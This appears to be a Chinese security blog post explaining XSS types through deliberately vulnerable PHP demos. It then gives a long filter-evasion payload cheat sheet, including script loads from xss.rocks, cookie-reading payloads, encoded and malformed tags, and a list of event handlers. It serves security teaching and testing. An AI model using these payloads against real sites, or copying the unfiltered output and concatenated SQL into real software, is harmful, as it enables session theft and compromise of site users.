    animation-duration: 2s;
    animation-name: fadeIn;
  }
  @keyframes fadeIn {
    from {
      opacity: 0;
    }
    to {
      opacity: 1;
    }
  }
</style>



<div class="masthead">
  <h3 class="container masthead-title">
    
    xss
    <a href="/" title="Home">
      <small>
        lazycat
      </small>
    </a>
    
  </h3>
</div>

<div class="container content">
  <div class="post">
  <span class="post-date">
    
    <i class="fas fa-calendar-day fa-fw"></i>
    11 Jul 2020
    
    
    <i class="fas fa-file-word fa-fw"></i>
    29429字
    
    
    <i class="fas fa-clock fa-fw"></i>
    99分
    
    
    <span class="leancloud-visitors" id="/_posts/2020-07-11-xss/" data-xid="/_posts/2020-07-11-xss/" data-flag-title="xss">
      <i class="fas fa-book-reader fa-fw"></i>
      <span class="leancloud-visitors-count">
        <i class="fas fa-spinner fa-pulse"></i>
      </span>次
    </span>
    
    
    
    <i class="fas fa-tag fa-fw"></i>
    安全
    
    
    <br/>
<i class="fas fa-coffee fa-fw"></i>
<a href="/merger/">如果这篇博客帮助到你，可以请我喝一杯咖啡~</a>
<br/>
<i class="fab fa-creative-commons-by fa-fw"></i>
<a
  href="https://creativecommons.org/licenses/by/4.0/deed.zh"
  rel="license">
  CC BY 4.0
</a>
（除特别声明或转载文章外）

    
  </span>
  <p>[toc]</p>

<h1 id="xss概念">XSS概念</h1>

<p>跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的目的。
 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中，通过用户本地浏览器执行的，所以xss漏洞关键就是<strong>寻找参数未过滤的输出函数</strong>。
 常见的输出函数有： <code>echo printf print print_r sprintf die var-dump var_export</code></p>

<h1 id="分类">分类</h1>

<ul>
  <li>反射型XSS：**<非持久化>** 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码（服务器中没有这样的页面和内容），一般容易出现在搜索页面。</非持久化></li>
  <li>存储型XSS：**<持久化>** 代码是存储在服务器中的，如在个人信息或发表文章等地方，加入代码，如果没有过滤或过滤不严，那么这些代码将储存到服务器中，每当有用户访问该页面的时候都会触发代码执行，这种XSS非常危险，容易造成蠕虫，大量盗窃cookie（虽然还有种DOM型XSS，但是也还是包括在存储型XSS内）</持久化></li>
  <li>DOM型XSS：基于文档对象模型Document Objeet Model，DOM)的一种漏洞。DOM是一个与平台、编程语言无关的接口，它允许程序或脚本动态地访问和更新文档内容、结构和样式，处理后的结果能够成为显示页面的一部分。DOM中有很多对象，其中一些是用户可以操纵的，如uRI ，location，refelTer等。客户端的脚本程序可以通过DOM动态地检查和修改页面内容，它不依赖于提交数据到服务器端，而从客户端获得DOM中的数据在本地执行，如果DOM中的数据没有经过严格确认，就会产生DOM XSS漏洞</li>
</ul>

<h1 id="原理">原理</h1>

<h2 id="反射型">反射型</h2>

<p>新建一个xss.php文件并加入以下代码:</p>

<pre><code class="language-php+HTML">\\XSS反射演示  
&lt;form action="" method="get"&gt;  
    &lt;input type="text" name="xss"/&gt;  
    &lt;input type="submit" value="test"/&gt;  
&lt;/form&gt;  
&lt;?php  
    $xss = @$_GET['xss'];  
    if($xss!==null){  
        echo $xss;  
    }
?&gt;
</code></pre>

<p>这段代码中首先包含一个表单，用于向页面自己发送<code>GET</code>请求，带一个名为xss的参数。 然后PHP会读取该参数，如果不为空，则直接打印出来，这里不存在任何过滤。也就是说，如果xss中存在HTML结构性的内容，打印之后会直接解释为HTML元素。</p>

<p>直接输入一个js代码，比如<code>&lt;script&gt;alert('hack')&lt;/script&gt;</code>可以看到触发弹窗</p>

<h2 id="存储型">存储型</h2>

<p>把xss.php内容改为下述内容:</p>

<pre><code class="language-php+HTML">\\存储XSS演示  
&lt;form action="" method="post"&gt;  
    &lt;input type="text" name="xss"/&gt;  
    &lt;input type="submit" value="test"/&gt;  
&lt;/form&gt;  
&lt;?php  
    $xss=@$_POST['xss'];  
    mysql_connect("localhost","root","123");  
    mysql_select_db("xss");  
    if($xss!==null){  
        $sql="insert into temp(id,payload) values('1','$xss')";  
        $result=mysql_query($sql);  
        echo $result;  
    }
?&gt;
</code></pre>

<p>用户输入的内容还是没有过滤，但是不直接显示在页面中，而是插入到了数据库</p>

<p>新建show.php，内容为：</p>

<pre><code class="language-php+HTML">&lt;?php 
    mysql_connect("localhost","root","root");  
    mysql_select_db("xss");  
    $sql="select payload from temp where id=1";  
    $result=mysql_query($sql);  
    while($row=mysql_fetch_array($result)){  
        echo $row['payload'];  
    }
?&gt;
</code></pre>

<p>该代码从数据库读取了之前插入的内容，并将其显示出来</p>

<p>直接输入一个js代码，比如<code>&lt;script&gt;alert('hack')&lt;/script&gt;</code>可以看到触发弹窗,且保存到数据库中了</p>

<h2 id="dom型">DOM型</h2>

<p>把xss.php内容改为</p>

<pre><code class="language-php+HTML">&lt;?php  
    error_reporting(0); //禁用错误报告  
    $name = $_GET["name"];  
?&gt;  
&lt;input id="text" type="text" value="&lt;?php echo $name;?&gt;" /&gt;  
&lt;div id="print"&gt;&lt;/div&gt;  
&lt;script type="text/javascript"&gt;  
    var text = document.getElementById("text");   
    var print = document.getElementById("print");  
    print.innerHTML = text.value; // 获取 text的值，并且输出在print内。这里是导致xss的主要原因。  
&lt;/script&gt;
</code></pre>

<p>在URL构造：<em>?name=&lt; img src=1 onerror = alert(xss)&gt;</em></p>

<p>触发弹窗</p>

<h1 id="绕过过滤器">绕过过滤器</h1>

<h2 id="xss定位器">XSS定位器</h2>

<p>在大多数存在漏洞且不需要特定XSS攻击代码的地方插入下列代码会弹出包含“XSS”字样的对话框。使用URL编码器来对整个代码进行编码。小技巧：如果你时间很紧想要快速检查页面，通常只要插入“<任意文本>”标签，然后观察页面输出是否明显改变了就可以判断是否存在漏洞：</任意文本></p>

<pre><code class="language-php+HTML">';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";

alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--

&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
</code></pre>

<p>如果你没有足够的空间并且知道页面上没有存在漏洞的JavaScript，这个字符串是一个不错的简洁XSS注入检查。注入后查看页面源代码并且寻找是否存在<strong>&lt;XSS</strong> 或<strong>&lt;XSS</strong>字样来确认是否存在漏洞</p>

<pre><code class="language-php+HTML">'';!--"&lt;XSS&gt;=&amp;{()}
</code></pre>

<h2 id="无过滤绕过">无过滤绕过</h2>

<p>这是一个常规的XSS注入代码，虽然通常它会被防御，但是建议首先去测试一下。（引号在任何现代浏览器中都不需要，所以这里省略了它）：</p>

<pre><code class="language-php+HTML">&lt;SCRIPT SRC=http://xss.rocks/xss.js&gt;&lt;/SCRIPT&gt;
</code></pre>

<h2 id="利用多语言进行过滤绕过">利用多语言进行过滤绕过</h2>

<pre><code class="language-php+HTML">'"&gt;&gt;&lt;marquee&gt;&lt;img src=x onerror=confirm(1)&gt;&lt;/marquee&gt;"&gt;&lt;/plaintext\&gt;&lt;/|\&gt;&lt;plaintext/onmouseover=prompt(1)&gt;

&lt;script&gt;prompt(1)&lt;/script&gt;@gmail.com&lt;isindex formaction=javascript:alert(/XSS/) type=submit&gt;'--&gt;"&gt;&lt;/script&gt;

&lt;script&gt;alert(document.cookie)&lt;/script&gt;"&gt;

&lt;img/id="confirm&amp;lpar;1)"/alt="/"src="/"onerror=eval(id)&gt;'"&gt;

&lt;img src="http://www.shellypalmer.com/wp-content/images/2015/07/hacked-compressor.jpg"&gt;
</code></pre>

<h2 id="通过javascript命令实现的图片xss">通过JavaScript命令实现的图片XSS</h2>

<p>图片注入使用JavaScript命令实现（IE7.0 不支持在图片上下文中使用JavaScript 命令，但是可以在其他上下文触发。下面的例子展示了一种其他标签依旧通用的原理）</p>

<pre><code class="language-php+HTML">&lt;IMG SRC="javascript:alert('XSS');"&gt;
</code></pre>

<h2 id="无分号无引号">无分号无引号</h2>

<pre><code class="language-php+HTML">&lt;IMG SRC=javascript:alert('XSS')&gt; 
</code></pre>

<h2 id="不区分大小写的xss攻击向量">不区分大小写的XSS攻击向量</h2>

<pre><code class="language-php+HTML">&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt;
</code></pre>

<h2 id="html实体">HTML实体</h2>

<p>必须有分号才可生效</p>

<pre><code class="language-php+HTML">&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;
</code></pre>

<h2 id="重音符混淆">重音符混淆</h2>

<p>如果你的JavaScript代码中需要同时使用单引号和双引号，那么可以使用重音符（`）来包含JavaScript 代码。这通常会有很大帮助，因为大部分跨站脚本过滤器都没有过滤这个字符</p>

<pre><code class="language-php+HTML">&lt;IMG SRC=`javascript:alert("RSnake says, 'XSS'")`&gt;
</code></pre>

<h2 id="畸形的a标签">畸形的A标签</h2>

<p>跳过HREF标签找到XSS的重点。。。由DavidCross提交~已在Chrome上验证</p>

<pre><code class="language-php+HTML">&lt;a onmouseover="alert(document.cookie)"&gt;xxs link&lt;/a&gt;
</code></pre>

<p>此外Chrome经常帮你补全确实的引号。。。如果在这方面遇到问题就直接省略引号，Chrome会帮你补全在URL或脚本中缺少的引号</p>

<pre><code class="language-php+HTML">&lt;a onmouseover=alert(document.cookie)&gt;xxs link&lt;/a&gt;
</code></pre>

<h2 id="畸形的img标签">畸形的IMG标签</h2>

<p>最初由Begeek发现（短小精湛适用于所有浏览器），这个XSS攻击向量使用了不严格的渲染引擎来构造含有IMG标签并被引号包含的XSS攻击向量。我猜测这种解析原来是为了兼容不规范的编码。这会让它更加难以正确的解析HTML标签</p>

<pre><code class="language-php+HTML">&lt;IMG """&gt;&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;"&gt;
</code></pre>

<h2 id="fromcharcode函数">fromCharCode函数</h2>

<p>如果不允许任何形式的引号，你可以通过执行JavaScript里的fromCharCode函数来创建任何你需要的XSS攻击向量</p>

<pre><code class="language-php+HTML">&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt; 
</code></pre>

<h2 id="使用默认src属性绕过src域名过滤器">使用默认SRC属性绕过SRC域名过滤器</h2>

<p>这种方法可以绕过大多数SRC域名过滤器。将JavaScript代码插入事件方法同样适用于注入使用elements的任何HTML标签，例如Form,Iframe, Input,  Embed等等。它同样允许将事件替换为任何标签中可用的事件类型，例如onblur,onclick。下面会给出许多不同的可注入事件列表。由David Cross提交，Abdullah Hussam(@Abdulahhusam)编辑</p>

<pre><code class="language-php+HTML">&lt;IMG SRC=# onmouseover="alert('xxs')"&gt;
</code></pre>

<h2 id="使用默认为空的src属性">使用默认为空的SRC属性</h2>

<pre><code class="language-php+HTML">&lt;IMG SRC= onmouseover="alert('xxs')"&gt;
</code></pre>

<h2 id="使用不含src属性">使用不含SRC属性</h2>

<pre><code class="language-php+HTML">&lt;IMG onmouseover="alert('xxs')"&gt;
</code></pre>

<h2 id="通过error事件触发alert">通过error事件触发alert</h2>

<pre><code class="language-php+HTML">&lt;IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"&gt;&lt;/img&gt;
</code></pre>

<h2 id="对img标签中onerror属性进行编码">对IMG标签中onerror属性进行编码</h2>

<pre><code class="language-php+HTML">&lt;img src=x onerror="&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041"&gt;
</code></pre>

<h2 id="十进制html字符实体编码">十进制HTML字符实体编码</h2>

<p>所有在IMG标签里直接使用javascript:形式的XSS示例无法在Firefox或Netscape8.1以上浏览器（使用Gecko渲染引擎）运行</p>

<pre><code class="language-php+HTML"> &lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;
    &amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;
</code></pre>

<h2 id="不带分号的十进制html字符实体编码">不带分号的十进制HTML字符实体编码</h2>

<p>这对于绕过对“&amp;#XX;”形式的XSS过滤非常有用，因为大多数人不知道最长可使用7位数字。这同样对例如$tmp_string  =~s/.<em>\&amp;#(\d+);.</em>/$1/;形式的过滤器有效，这种过滤器是错误的认为HTML字符实体编码需要用分号结尾（无意中发现的</p>

<pre><code class="language-php"> &lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;   #0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;
</code></pre>

<h2 id="不带分号的十六进制html字符实体编码">不带分号的十六进制HTML字符实体编码</h2>

<p>这是有效绕过例如$tmp_string =~ s/.<em>\&amp;#(\d+);.</em>/$1/;过滤器的方法。这种过滤器错误的认为#号后会跟着数字（十六进制HTML字符实体编码并非如此）</p>

<pre><code class="language-php+HTML">&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;
</code></pre>

<h2 id="内嵌tab">内嵌TAB</h2>

<p>使用TAB来分开XSS攻击代码</p>

<pre><code class="language-php+HTML">&lt;IMG SRC="jav ascript:alert('XSS');"&gt;
</code></pre>

<h2 id="内嵌编码后tab">内嵌编码后TAB</h2>

<p>使用编码后的TAB来分开XSS攻击代码</p>

<pre><code class="language-php+HTML">&lt;IMG SRC="jav&amp;#x09;ascript:alert('XSS');"&gt; 
</code></pre>

<h2 id="内嵌换行分隔xss攻击代码">内嵌换行分隔XSS攻击代码</h2>

<p>一些网站声称09到13（十进制）的HTML实体字符都可以实现这种攻击，这是不正确的。只有09（TAB），10（换行）和13（回车）有效。查看ASCII字符表获取更多细节。下面几个XSS示例介绍了这些向量</p>

<pre><code class="language-php+HTML">&lt;IMG SRC="jav&amp;#x0A;ascript:alert('XSS');"&gt;
</code></pre>

<h2 id="内嵌回车分隔xss攻击代码">内嵌回车分隔XSS攻击代码</h2>

<p>注意：上面使用了比实际需要长的字符串是因为0可以忽略。经常可以遇到过滤器解码十六进制和十进制编码时认为只有2到3位字符。实际规则是1至7位字符</p>

<pre><code class="language-php+HTML">&lt;IMG SRC="jav&amp;#x0D;ascript:alert('XSS');"&gt;
</code></pre>

<h2 id="使用空字符分隔javascript指令">使用空字符分隔JavaScript指令</h2>

<p>空字符同样可以作为XSS攻击向量，但和上面有所区别，你需要使用一些例如Burp工具或在URL字符串里使用%00，亦或你想使用VIM编写自己的注入工具（^V^@会生成空字符），还可以通过程序生成它到一个文本文件。老版本的Opera浏览器（例如Windows版的7.11）还会受另一个字符173（软连字符）的影响。但是空字符%00更加有用并且能帮助绕过真实世界里的过滤器，例如这个例子里的变形：</p>

<pre><code class="language-php+HTML">perl -e 'print "&lt;IMG SRC=java\0script:alert(\"XSS\")&gt;";' &gt; out
</code></pre>

<h2 id="利用img标签中javascript指令前的空格和元字符">利用IMG标签中JavaScript指令前的空格和元字符</h2>

<p>如果过滤器不计算”javascript:”前的空格，这是正确的，因为它们不会被解析，但这点非常有用。因为这会造成错误的假设，就是引号和”javascript:”字样间不能有任何字符。实际情况是你可以插入任何十进制的1至32号字符</p>

<pre><code class="language-php+HTML">&lt;IMG SRC=" &amp;#14;  javascript:alert('XSS');"&gt; 
</code></pre>

<h2 id="利用非字母非数字字符">利用非字母非数字字符</h2>

<p>FireFox的HTML解析器认为HTML关键词后不能有非字母非数字字符，并且认为这是一个空白或在HTML标签后的无效符号。但问题是有的XSS过滤器认为它们要查找的标记会被空白字符分隔。例如”&lt;SCRIPT\s” != “&lt;SCRIPT/XSS\s”:</p>

<pre><code class="language-php+HTML">&lt;SCRIPT/XSS SRC="http://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;
</code></pre>

<p>基于上面的原理，可以使用模糊测试进行扩展。Gecko渲染引擎允许任何字符包括字母，数字或特殊字符（例如引号，尖括号等）存在于事件名称和等号之间，这会使得更加容易绕过跨站脚本过滤。注意这同样适用于下面看到的重音符:</p>

<pre><code class="language-php+HTML">&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert("XSS")&gt;
</code></pre>

<p>Yair Amit让我注意到了IE和Gecko渲染引擎有一点不同行为，在于是否在HTML标签和参数之间允许一个不含空格的斜杠。这会非常有用如果系统不允许空格的时候</p>

<pre><code class="language-php+HTML">&lt;SCRIPT/SRC="http://xss.rocks/xss.js"&gt;&lt;/SCRIPT&gt;
</code></pre>

<h2 id="额外的尖括号">额外的尖括号</h2>

<p>这个XSS攻击向量可以绕过某些检测引擎，比如先查找第一个匹配的尖括号，然后比较里面的标签内容，而不是使用更有效的算法，例如Boyer-Moore算法就是查找整个字符串中的尖括号和相应标签（当然是通过模糊匹配）。双斜杠注释了额外的尖括号来防止出现JavaScript错误</p>

<pre><code class="language-php+HTML">&lt;&lt;SCRIPT&gt;alert("XSS");//&lt;&lt;/SCRIPT&gt;
</code></pre>

<h2 id="未闭合的script标签">未闭合的script标签</h2>

<p>在Firefox和Netscape  8.1的Gecko渲染引擎下你不是必须构造类似“&gt;&lt;/SCRIPT&gt;”的跨站脚本攻击向量。Firefox假定闭合HTML标签是安全的并且会为你添加闭合标记。多么体贴！不像不影响Firefox的下一个问题，这不需要在后面有额外的HTML标签。如果需要可以添加引号，但通常是没有必要的，需要注意的是，我并不知道这样注入后HTML会什么样子结束:</p>

<pre><code class="language-php+HTML">&lt;SCRIPT SRC=http://xss.rocks/xss.js?&lt; B &gt;
</code></pre>

<h2 id="script标签中的协议解析">script标签中的协议解析</h2>

<p>这个特定的变体是由Łukasz  Pilorz提交的并且基于Ozh提供的协议解析绕过。这个跨站脚本示例在IE和Netscape的IE渲染模式下有效，如果添加了&lt;/SCRIPT&gt;标记在Opera中也可以。这在输入空间有限的情况下是非常有用的，你所使用的域名越短越好。”.j”是可用的，在SCRIPT标签中不需要考虑编码类型因为浏览器会自动识别</p>

<pre><code class="language-php+HTML">&lt;SCRIPT SRC=//xss.rocks/.j&gt;
</code></pre>

<h2 id="只含左尖括号的htmljavascript-xss向量">只含左尖括号的HTML/JavaScript XSS向量</h2>

<table>
  <tbody>
    <tr>
      <td>IE渲染引擎不像Firefox，不会向页面中添加额外数据。但它允许在IMG标签中直接使用javascript。这对构造攻击向量是很有用的，因为不需要闭合尖括号。这使得有任何HTML标签都可以进行跨站脚本攻击向量注入。甚至可以不使用”&gt;”闭合标签。注意：这会让HTML页面变得混乱，具体程度取决于下面的HTML标签。这可以绕过以下NIDS正则:/((\%3D)</td>
      <td>(=))[^\n]*((\%3C)</td>
      <td>&lt;)[^\n]+((\%3E)</td>
      <td>&gt;)/因为不需要”&gt;”闭合。另外在实际对抗XSS过滤器的时候，使用一个半开放的&lt;IFRAME标签替代&lt;IMG标签也是非常有效的</td>
    </tr>
  </tbody>
</table>

<pre><code class="language-php+HTML">&lt;IMG SRC="javascript:alert('XSS')" 
</code></pre>

<h2 id="多个左尖括号">多个左尖括号</h2>

<p>使用一个左尖括号替代右尖括号作为标签结尾的攻击向量会在不同浏览器的Gecko渲染引擎下有不同表现。没有左尖括号时，在Firefox中生效，而在Netscape中无效。</p>

<pre><code class="language-php+HTML">&lt;iframe src=http://xss.rocks/scriptlet.html &lt;
</code></pre>

<h2 id="javascript双重转义">JavaScript双重转义</h2>

<p>当应用将一些用户输入输出到例如：<script>var  a="$ENV{QUERY_STRING}";</script>的JavaScript中时，你想注入你的JavaScript脚本，你可以通过转义转义字符来规避服务器端转义引号。注入后会得到<script>vara="\\";alert('XSS');//";</script>，这时双引号不会被转义并且可以触发跨站脚本攻击向量。XSS定位器就用了这种方法</p>

<pre><code class="language-php+HTML">\";alert('XSS');//
</code></pre>

<p>另一种情况是，如果内嵌数据进行了正确的JSON或JavaScript转义，但没有HTML编码，那可以结束原有脚本块并开始你自己的：</p>

<pre><code class="language-php+HTML">&lt;/script&gt;&lt;script&gt;alert('XSS');&lt;/script&gt;
</code></pre>

<h2 id="闭合title标签">闭合title标签</h2>

<p>这是一个简单的闭合<TITLE>标签的XSS攻击向量，可以包含恶意的跨站脚本攻击</TITLE></p>

<pre><code class="language-php+HTML">&lt;/TITLE&gt;&lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt;
</code></pre>

<h2 id="input-image">INPUT image</h2>

<pre><code class="language-php+HTML">&lt;INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"&gt;
</code></pre>

<h2 id="body-image">BODY image</h2>

<pre><code class="language-php+HTML">&lt;BODY BACKGROUND="javascript:alert('XSS')"&gt;
</code></pre>

<h2 id="img-dynsrc">IMG Dynsrc</h2>

<pre><code class="language-php+HTML">&lt;IMG DYNSRC="javascript:alert('XSS')"&gt; 
</code></pre>

<h2 id="img-lowsrc">IMG lowsrc</h2>

<pre><code class="language-php+HTML">&lt;IMG LOWSRC="javascript:alert('XSS')"&gt;
</code></pre>

<h2 id="list-style-image">List-style-image</h2>

<p>处理嵌入的图片列表是很麻烦的问题。由于JavaScript指令的原因只能在IE渲染引擎下有效。不是一个特别有用的跨站脚本攻击向量:</p>

<pre><code class="language-php+HTML">&lt;STYLE&gt;li {list-style-image: url("javascript:alert('XSS')");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS&lt;/br&gt;
</code></pre>

<h2 id="图片中引用vbscript">图片中引用VBscript</h2>

<pre><code class="language-php+HTML">&lt;IMG SRC='vbscript:msgbox("XSS")'&gt;
</code></pre>

<h2 id="livescript-仅限旧版本netscape">Livescript (仅限旧版本Netscape)</h2>

<pre><code class="language-php+HTML">&lt;IMG SRC="livescript:[code]"&gt;
</code></pre>

<h2 id="svg对象标签">SVG对象标签</h2>

<pre><code class="language-php+HTML">&lt;svg/onload=alert('XSS')&gt; 
</code></pre>

<h2 id="ecmascript-6">ECMAScript 6</h2>

<pre><code class="language-php+HTML">Set.constructor`alert\x28document.domain\x29``` 
</code></pre>

<h2 id="body标签">BODY标签</h2>

<p>这个方法不需要使用任何例如”javascript:”或”&lt;SCRIPT…“语句来完成XSS攻击。Dan Crowley特别提醒你可以在等号前加入一个空格(“onload=” != “onload =”):</p>

<pre><code class="language-php+HTML">&lt;BODY ONLOAD=alert('XSS')&gt;
</code></pre>

<h2 id="事件处理程序">事件处理程序</h2>

<p>在XSS攻击中可使用以下事件</p>

<pre><code>

    1.    FSCommand() (攻击者当需要在嵌入的Flash对象中执行时可以使用此事件)

    2.    onAbort() (当用户中止加载图片时)

    3.    onActivate() (当对象激活时)

    4.    onAfterPrint() (用户打印或进行打印预览后触发)

    5.    onAfterUpdate() (从数据源对象更新数据后由数据对象触发)

    6.    onBeforeActivate() (在对象设置为激活元素前触发)

    7.    onBeforeCopy() (攻击者在选中部分拷贝到剪贴板前执行攻击代码-攻击者可以通过执行execCommand("Copy")函数触发)

    8.    onBeforeCut() (攻击者在选中部分剪切到剪贴板前执行攻击代码)

    9.    onBeforeDeactivate() (在当前对象的激活元素变化前触发)

    10.  onBeforeEditFocus() (在一个包含可编辑元素的对象进入激活状态时或一个可编辑的对象被选中时触发)

    11.  onBeforePaste() (在用户被诱导进行粘贴前或使用execCommand("Paste")函数触发)

    12.  onBeforePrint() (用户需要被诱导进行打印或攻击者可以使用print()或execCommand("Print")函数).

    13.  onBeforeUnload() (用户需要被诱导关闭浏览器-除非从父窗口执行，否则攻击者不能关闭当前窗口)

    14.  onBeforeUpdate() (从数据源对象更新数据前由数据对象触发)

    15.  onBegin() (当元素周期开始时由onbegin 事件立即触发)

    16.  onBlur() (另一个窗口弹出当前窗口失去焦点时触发)

    17.  onBounce() (当marquee对象的behavior属性设置为“alternate”且字幕的滚动内容到达窗口一边时触发)

    18.  onCellChange() (当数据提供者的数据变化时触发)

    19.  onChange() (select，text, 或TEXTAREA字段失去焦点并且值发生变化时触发)

    20.  onClick() (表单中点击触发)

    21.  onContextMenu() (用户需要在攻击区域点击右键)

    22.  onControlSelect() (当用户在一个对象上创建控件选中区时触发)

    23.  onCopy() (用户需要复制一些东西或使用execCommand("Copy")命令时触发)

    24.  onCut() (用户需要剪切一些东西或使用execCommand("Cut")命令时触发)

    25.  onDataAvailable() (用户需要修改元素中的数据，或者由攻击者提供的类似功能)

    26.  onDataSetChanged() (当数据源对象变更导致数据集发生变更时触发)

    27.  onDataSetComplete() (数据源对象中所有数据可用时触发)

    28.  onDblClick() (用户双击一个表单元素或链接)

    29.  onDeactivate() (在激活元素从当前对象转换到父文档中的另一个对象时触发)

    30.  onDrag() (在元素正在拖动时触发)

    31.  onDragEnd() (当用户完成元素的拖动时触发)

    32.  onDragLeave() (用户在拖动元素离开放置目标时触发)

    33.  onDragEnter() (用户将对象拖拽到合法拖曳目标)

    34.  onDragOver() (用户将对象拖拽划过合法拖曳目标)

    35.  onDragDrop() (用户将一个对象（例如文件）拖拽到浏览器窗口)

    36.  onDragStart() (当用户开始拖动元素时触发)

    37.  onDrop() (当拖动元素放置在目标区域时触发)

    38.  onEnded() (在视频/音频（audio/video）播放结束时触发)

    39.  onError() (在加载文档或图像时发生错误)

    40.  onErrorUpdate() (当从数据源对象更新相关数据遇到错误时在数据绑定对象上触发)

    41.  onFilterChange() (当滤镜完成状态变更时触发)

    42.  onFinish() (当marquee完成滚动时攻击者可以执行攻击)

    43.  onFocus() (当窗口获得焦点时攻击者可以执行攻击代码)

    44.  onFocusIn() (当元素将要被设置为焦点之前触发)

    45.  onFocusOut() (攻击者可以在窗口失去焦点时触发攻击代码)

    46.  onHashChange() (当锚部分发生变化时触发攻击代码)

    47.  onHelp() (攻击者可以在用户在当前窗体激活时按下F1触发攻击代码)

    48.  onInput() (在 &lt;input&gt; 或 &lt;textarea&gt; 元素的值发生改变时触发)

    49.  onKeyDown() (用户按下一个键的时候触发)

    50.  onKeyPress() (在键盘按键被按下并释放一个键时触发)

    51.  onKeyUp() (用户释放一个键时触发)

    52.  onLayoutComplete() (用户进行完打印或打印预览时触发)

    53.  onLoad() (攻击者在窗口加载后触发攻击代码)

    54.  onLoseCapture() (可以由releaseCapture()方法触发)

    55.  onMediaComplete() (当一个流媒体文件使用时，这个事件可以在文件播放前触发)

    56.  onMediaError() (当用户在浏览器中打开一个包含媒体文件的页面，出现问题时触发事件)

    57.  onMessage() (当页面收到一个信息时触发事件)

    58.  onMouseDown() (攻击者需要让用户点击一个图片触发事件)

    59.  onMouseEnter() (光标移动到一个对象或区域时触发)

    60.  onMouseLeave() (攻击者需要让用户光标移动到一个图像或表格然后移开来触发事件)

    61.  onMouseMove() (攻击者需要让用户将光标移到一个图片或表格)

    62.  onMouseOut() (攻击者需要让用户光标移动到一个图像或表格然后移开来触发事件)

    63.  onMouseOver() (光标移动到一个对象或区域)

    64.  onMouseUp() (攻击者需要让用户点击一个图片)

    65.  onMouseWheel() (攻击者需要让用户使用他们的鼠标滚轮)

    66.  onMove() (用户或攻击者移动页面时触发)

    67.  onMoveEnd() (用户或攻击者移动页面结束时触发)

    68.  onMoveStart() (用户或攻击者开始移动页面时触发)

    69.  onOffline() (当浏览器从在线模式切换到离线模式时触发)

    70.  onOnline() (当浏览器从离线模式切换到在线模式时触发)

    71.  onOutOfSync() (当元素与当前时间线失去同步时触发)

    72.  onPaste() (用户进行粘贴时或攻击者可以使用execCommand("Paste")函数时触发)

    73.  onPause() (在视频或音频暂停时触发)

    74.  onPopState() (在窗口的浏览历史（history 对象）发生改变时触发)

    75.  onProgress() (攻击者可以在一个FLASH加载时触发事件)

    76.  onPropertyChange() (用户或攻击者需要改变元素属性时触发)

    77.  onReadyStateChange() (每次 readyState 属性变化时被自动调用)

    78.  onRedo() (用户返回上一页面时触发)

    79.  onRepeat() (事件在播放完重复播放时触发)

    80.  onReset() (用户或攻击者重置表单时触发)

    81.  onResize() (用户改变窗口大小时，攻击者可以自动以这种方法触发:&lt;SCRIPT&gt;self.resizeTo(500,400);&lt;/SCRIPT&gt;)

    82.  onResizeEnd() (用户完成改变窗体大小时触发)

    83.  onResizeStart() (用户开始改变窗体大小时触发)

    84.  onResume() (当元素继续播放时触发)

    85.  onReverse() (当元素回放时触发)

    86.  onRowsEnter() (用户或攻击者需要改变数据源中的一行)

    87.  onRowExit() (用户或攻击者改变数据源中的一行后退出时触发)

    88.  onRowDelete() (用户或攻击者需要删除数据源中的一行)

    89.  onRowInserted() (user or attacker would needto insert a row in a data source)

    90.  onScroll() (用户需要滚动或攻击者使用scrollBy()函数)

    91.  onSeek() (当用户在元素上执行查找操作时触发)

    92.  onSelect() (用户需要选择一些文本-攻击者可以以此方式触发: window.document.execCommand("SelectAll");)

    93.  onSelectionChange() (当用户选择文本变化时触发-攻击者可以以此方式触发: window.document.execCommand("SelectAll");)

    94.  onSelectStart() (当用户开始选择文本时触发-攻击者可以以此方式触发: window.document.execCommand("SelectAll");)

    95.  onStart() (在marquee 对象开始循环时触发)

    96.  onStop() (当用户按下停止按钮或离开页面时触发)

    97.  onStorage() (当Web Storage更新时触发)

    98.  onSyncRestored() (当元素与它的时间线恢复同步时触发)

